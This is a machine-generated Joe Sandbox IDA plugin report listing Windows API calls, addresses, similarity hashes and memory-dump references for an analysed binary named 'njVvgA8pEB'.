                                                                          • KillTimer.USER32(?,00000001,?,?), ref: 00314524
                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00314533
                                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0034D4B9
                                                                          Similarity
                                                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                          • String ID:
                                                                          • API String ID: 1378193009-0
                                                                          • Opcode ID: 7831c0d6ab6c54c9f5c3415c3d7d91cce6716622c22049d5f370a2c6fe685d5f
                                                                          • Instruction ID: 9959559fe596bfe33d78cf2dcd7d1917fbf6be4982af0f21ed98437d51eba1cb
                                                                          • Opcode Fuzzy Hash: 7831c0d6ab6c54c9f5c3415c3d7d91cce6716622c22049d5f370a2c6fe685d5f
                                                                          • Instruction Fuzzy Hash: 4D2107705047849FE7338B259845BE7BBEC9F0A304F04009EE69E9A281C7742984CB41
                                                                          APIs
                                                                            • Part of subcall function 00315A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00377896,?,?,00000000), ref: 00315A2C
                                                                            • Part of subcall function 00315A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00377896,?,?,00000000,?,?), ref: 00315A50
                                                                          • gethostbyname.WSOCK32(?,?,?), ref: 00386399
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003863A4
                                                                          • _memmove.LIBCMT ref: 003863D1
                                                                          • inet_ntoa.WSOCK32(?), ref: 003863DC
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                          • String ID:
                                                                          • API String ID: 1504782959-0
                                                                          • Opcode ID: 3b6de1db72db1964ac3b524e8e769284d39f4984ea2307cb044f410ecabdf31a
                                                                          • Instruction ID: ce5f20c3e5ce29f7b55fd7c9c9f5b26be273bebf36686d919a444629f667e413
                                                                          • Opcode Fuzzy Hash: 3b6de1db72db1964ac3b524e8e769284d39f4984ea2307cb044f410ecabdf31a
                                                                          • Instruction Fuzzy Hash: F5114C32600109AFCB06FBA4D996DEEB7BDAF48310B144065F506EB161DB31AE54CB61
                                                                          APIs
                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00368B61
                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00368B73
                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00368B89
                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00368BA4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: d5047a9648ac42bf9edce492d9586d7c9cbc087e0aaf23158afc5c19edcedc0e
                                                                          • Instruction ID: d2ec70323baaf93575024a11ecdc0ff3d244239c4bc405c03da1b23fb18d5a10
                                                                          • Opcode Fuzzy Hash: d5047a9648ac42bf9edce492d9586d7c9cbc087e0aaf23158afc5c19edcedc0e
                                                                          • Instruction Fuzzy Hash: FD114879900218FFEB11DFA5CC84FADBBB8FB48310F2041A5EA00B7294DA716E11DB94
                                                                          APIs
                                                                            • Part of subcall function 00312612: GetWindowLongW.USER32(?,000000EB), ref: 00312623
                                                                          • DefDlgProcW.USER32(?,00000020,?), ref: 003112D8
                                                                          • GetClientRect.USER32(?,?), ref: 0034B5FB
                                                                          • GetCursorPos.USER32(?), ref: 0034B605
                                                                          • ScreenToClient.USER32(?,?), ref: 0034B610
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                                          • String ID:
                                                                          • API String ID: 4127811313-0
                                                                          • Opcode ID: 687e85d8d5c0533cc14ab84bd80c651d0f7f4ab47123f3ff2d20f5c1d9cf0faf
                                                                          • Instruction ID: 283b1a96a58b44a2563b81407254305a9f7d07b821f09a76c7bfc39ac28189a0
                                                                          • Opcode Fuzzy Hash: 687e85d8d5c0533cc14ab84bd80c651d0f7f4ab47123f3ff2d20f5c1d9cf0faf
                                                                          • Instruction Fuzzy Hash: A2113A35601119EFCF16EF98D8859EE77B8EB0A301F500856FA41E7240C735BA929BA5
                                                                          APIs
                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0036D84D
                                                                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0036D864
                                                                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0036D879
                                                                          • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0036D897
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Type$Register$FileLoadModuleNameUser
                                                                          • String ID:
                                                                          • API String ID: 1352324309-0
                                                                          • Opcode ID: d1eb55f4e3508059701220c97caa69193f269bfbda721c11557e1dec88fc16ab
                                                                          • Instruction ID: 846908dcc29ae18c5a0a8bf09d578065de17a66a89dbce2183d3bfcadf6bf924
                                                                          • Opcode Fuzzy Hash: d1eb55f4e3508059701220c97caa69193f269bfbda721c11557e1dec88fc16ab
                                                                          • Instruction Fuzzy Hash: F71157B5B05304EFE3228F51EC0CF92BBBCEB00B00F10856AAA16D7454D7B1E9599BA1
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                          • String ID:
                                                                          • API String ID: 3016257755-0
                                                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                          • Instruction ID: f618887dbf68de161a501d091d5114cda62c772b47e53bc0f54324af42ae9797
                                                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                          • Instruction Fuzzy Hash: C6014B7244914ABBCF275E84DC01CEE3FA6BB19350B598455FA585C031D336E9B1AB81
                                                                          APIs
                                                                          • GetWindowRect.USER32(?,?), ref: 0039B2E4
                                                                          • ScreenToClient.USER32(?,?), ref: 0039B2FC
                                                                          • ScreenToClient.USER32(?,?), ref: 0039B320
                                                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0039B33B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                          • String ID:
                                                                          • API String ID: 357397906-0
                                                                          • Opcode ID: 46e3526c743eaebf28dd69ea31c5e57fb677229234cd71ac65060d65483eea0e
                                                                          • Instruction ID: d71f7ad36e41948cf084f415a66ac8aaa08457ea6adc559af26ac4ddc5fedc8c
                                                                          • Opcode Fuzzy Hash: 46e3526c743eaebf28dd69ea31c5e57fb677229234cd71ac65060d65483eea0e
                                                                          • Instruction Fuzzy Hash: CC1143B9D00209EFDB41CFA9D9849EEFBB9FB08310F108166E914E3220D735AA658F50
                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00376BE6
                                                                            • Part of subcall function 003776C4: _memset.LIBCMT ref: 003776F9
                                                                          • _memmove.LIBCMT ref: 00376C09
                                                                          • _memset.LIBCMT ref: 00376C16
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00376C26
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                          • String ID:
                                                                          • API String ID: 48991266-0
                                                                          • Opcode ID: 316eb29c0ff3b0fca15c52521b92b9acc18f31eda03bef7744067b3276e78cc2
                                                                          • Instruction ID: db75ee829e9fe5c65d6e38b5dafffd93ab32ac9ceaf3caff0446d75436dfc2ff
                                                                          • Opcode Fuzzy Hash: 316eb29c0ff3b0fca15c52521b92b9acc18f31eda03bef7744067b3276e78cc2
                                                                          • Instruction Fuzzy Hash: 41F0543A200100ABCF066F55DC85A4ABB29EF45321F04C061FE089E227C735E811CBB4
                                                                          APIs
                                                                          • GetSysColor.USER32(00000008), ref: 00312231
                                                                          • SetTextColor.GDI32(?,000000FF), ref: 0031223B
                                                                          • SetBkMode.GDI32(?,00000001), ref: 00312250
                                                                          • GetStockObject.GDI32(00000005), ref: 00312258
                                                                          • GetWindowDC.USER32(?,00000000), ref: 0034BE83
                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0034BE90
                                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0034BEA9
                                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0034BEC2
                                                                          • GetPixel.GDI32(00000000,?,?), ref: 0034BEE2
                                                                          • ReleaseDC.USER32(?,00000000), ref: 0034BEED
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                          • String ID:
                                                                          • API String ID: 1946975507-0
                                                                          • Opcode ID: 30d82d764c078ee377660e38088e6d84f9143654e2340eef7b1fe63a66783046
                                                                          • Instruction ID: 38e8c38f9998c8891eb68a828727f40ed9a681249f63f6f7c2dc6f823f3a0459
                                                                          • Opcode Fuzzy Hash: 30d82d764c078ee377660e38088e6d84f9143654e2340eef7b1fe63a66783046
                                                                          • Instruction Fuzzy Hash: 37E03932104244AEDB225F64FC0D7D87B54EB06332F118367FA69880E187B289A0DB52
                                                                          APIs
                                                                          • GetCurrentThread.KERNEL32 ref: 0036871B
                                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,003682E6), ref: 00368722
                                                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,003682E6), ref: 0036872F
                                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,003682E6), ref: 00368736
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentOpenProcessThreadToken
                                                                          • String ID:
                                                                          • API String ID: 3974789173-0
                                                                          • Opcode ID: 0be39addefd84db6bff24ea42c5a8a332a3ed9ebcb6a651b2643d7a12c4b592b
                                                                          • Instruction ID: b514e803eff35e83b3bbf3fe3eb3e21e6e4bb243ecfc87743f07018e35bdb803
                                                                          • Opcode Fuzzy Hash: 0be39addefd84db6bff24ea42c5a8a332a3ed9ebcb6a651b2643d7a12c4b592b
                                                                          • Instruction Fuzzy Hash: 81E086366112119FD7215FB09D0DB563BACEF58791F158829B285C9044DA758451C760
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: %:
                                                                          • API String ID: 0-3402538441
                                                                          • Opcode ID: 3e40a82a5adeb4443a1a03bc00911b97b5acf5a1e2842bff751db8e09eebcd48
                                                                          • Instruction ID: 09a186fddfc601f66f551f725e3c2b0e0066af4773a77fd65249d091dd6979a4
                                                                          • Opcode Fuzzy Hash: 3e40a82a5adeb4443a1a03bc00911b97b5acf5a1e2842bff751db8e09eebcd48
                                                                          • Instruction Fuzzy Hash: 48B19F759001099BCF1AEFD8C8869FEB7B9EF4C310F144426E912AB191DB349EC6CB91
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: __itow_s
                                                                          • String ID: xb=$xb=
                                                                          • API String ID: 3653519197-611833825
                                                                          • Opcode ID: a85b867efca3ad75574f31a042a15a6ede3f892e4fae1bdc589c3e7c406ec82d
                                                                          • Instruction ID: aa4129a54c4ede398fa2ee9e92abf0ba5a8a7217a084b6e2379ebe2e62e278f9
                                                                          • Opcode Fuzzy Hash: a85b867efca3ad75574f31a042a15a6ede3f892e4fae1bdc589c3e7c406ec82d
                                                                          • Instruction Fuzzy Hash: EFB17070A0020AEFDB16EF54C895EEAB7B9FF58300F14849AF9459F252DB30E985CB50
                                                                          APIs
                                                                            • Part of subcall function 0032FC86: _wcscpy.LIBCMT ref: 0032FCA9
                                                                            • Part of subcall function 00319837: __itow.LIBCMT ref: 00319862
                                                                            • Part of subcall function 00319837: __swprintf.LIBCMT ref: 003198AC
                                                                          • __wcsnicmp.LIBCMT ref: 0037B02D
                                                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0037B0F6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                          • String ID: LPT
                                                                          • API String ID: 3222508074-1350329615
                                                                          • Opcode ID: 8ea5bbb9b4d7f1a77de5478220c140b25972541319cd089034c582ff56841ab4
                                                                          • Instruction ID: 0027723ea6620bf975960c5e73db92122f5104951db78b9eedbf488c33648948
                                                                          • Opcode Fuzzy Hash: 8ea5bbb9b4d7f1a77de5478220c140b25972541319cd089034c582ff56841ab4
                                                                          • Instruction Fuzzy Hash: 92617375A00215AFCB1ADF54C895FEEF7B8EF08310F11806AF91AAB251D774AE84CB50
                                                                          APIs
                                                                          • Sleep.KERNEL32(00000000), ref: 00322968
                                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 00322981
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: GlobalMemorySleepStatus
                                                                          • String ID: @
                                                                          • API String ID: 2783356886-2766056989
                                                                          • Opcode ID: b1bacf20a5b5a413dd62c4914e4bffe48293d0b579bb8514bdf3b0e6dfc15da3
                                                                          • Instruction ID: e0d535a67d7321787f17c639e58829f1efa821a650e0c77cb1cf49f5b7b8bf84
                                                                          • Opcode Fuzzy Hash: b1bacf20a5b5a413dd62c4914e4bffe48293d0b579bb8514bdf3b0e6dfc15da3
                                                                          • Instruction Fuzzy Hash: 9B513572508744ABD721EF10D886BEBBBE8FF89344F41885DF2D8450A1DB318569CB6A
                                                                          APIs
                                                                            • Part of subcall function 00314F0B: __fread_nolock.LIBCMT ref: 00314F29
                                                                          • _wcscmp.LIBCMT ref: 00379824
                                                                          • _wcscmp.LIBCMT ref: 00379837
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscmp$__fread_nolock
                                                                          • String ID: FILE
                                                                          • API String ID: 4029003684-3121273764
                                                                          • Opcode ID: 037ce1744941ef66e22f5ec7e62958de3255cd99c51e1613da18cb306d567127
                                                                          • Instruction ID: 2ed50ef8657456ba36eae553c0568f5cc16e8f89ee1c5e7128488a70f81ab95a
                                                                          • Opcode Fuzzy Hash: 037ce1744941ef66e22f5ec7e62958de3255cd99c51e1613da18cb306d567127
                                                                          • Instruction Fuzzy Hash: D041E631A00209BADF269EA4CC45FEFB7BDDF89710F01406AF904EB180DA759A458B61
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ClearVariant
                                                                          • String ID: Dd=$Dd=
                                                                          • API String ID: 1473721057-3871752360
                                                                          • Opcode ID: e00e16a31919079ee1e5ae1d66abd511a0e093c03b6ab0baf1fb5c5c22fa30b0
                                                                          • Instruction ID: ace6c896c057a2ef8342e6ed908de88f5e8fbdd58d1e6dc82af2e459125e6f93
                                                                          • Opcode Fuzzy Hash: e00e16a31919079ee1e5ae1d66abd511a0e093c03b6ab0baf1fb5c5c22fa30b0
                                                                          • Instruction Fuzzy Hash: FD51237860A7419FD75ACF19C480A9ABBF1BB99351F55881DE8858B321D732EC81CF42
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 0038259E
                                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 003825D4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CrackInternet_memset
                                                                          • String ID: |
                                                                          • API String ID: 1413715105-2343686810
                                                                          • Opcode ID: 4f29b26f554bd245ea5c91eb3e39cfc4ca89a975005eb25d2dc2412d396b5f34
                                                                          • Instruction ID: b1bb59d59ae438f6350418199ac8923c6f860e019894264667cc9780e3ba1bd1
                                                                          • Opcode Fuzzy Hash: 4f29b26f554bd245ea5c91eb3e39cfc4ca89a975005eb25d2dc2412d396b5f34
                                                                          • Instruction Fuzzy Hash: 31310771800219EBCF06EFA1CC85EEEBFB8FF08350F140059F955AA162EB315996DB60
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00397B61
                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00397B76
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: '
                                                                          • API String ID: 3850602802-1997036262
                                                                          • Opcode ID: 455c6a483d2a08daba3bbd581d781f4393fd7600e22dd0d51635f9f6ffac5ec2
                                                                          • Instruction ID: 5c6ae57e034e37732457cd5993885fd3c51ac9c44fef141a01a9e62179377e67
                                                                          • Opcode Fuzzy Hash: 455c6a483d2a08daba3bbd581d781f4393fd7600e22dd0d51635f9f6ffac5ec2
                                                                          • Instruction Fuzzy Hash: 0A410875A152099FDF15CF64D881BDABBB9FF08300F11016AE904EB391D770A951CF90
                                                                          APIs
                                                                          • DestroyWindow.USER32(?,?,?,?), ref: 00396B17
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00396B53
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
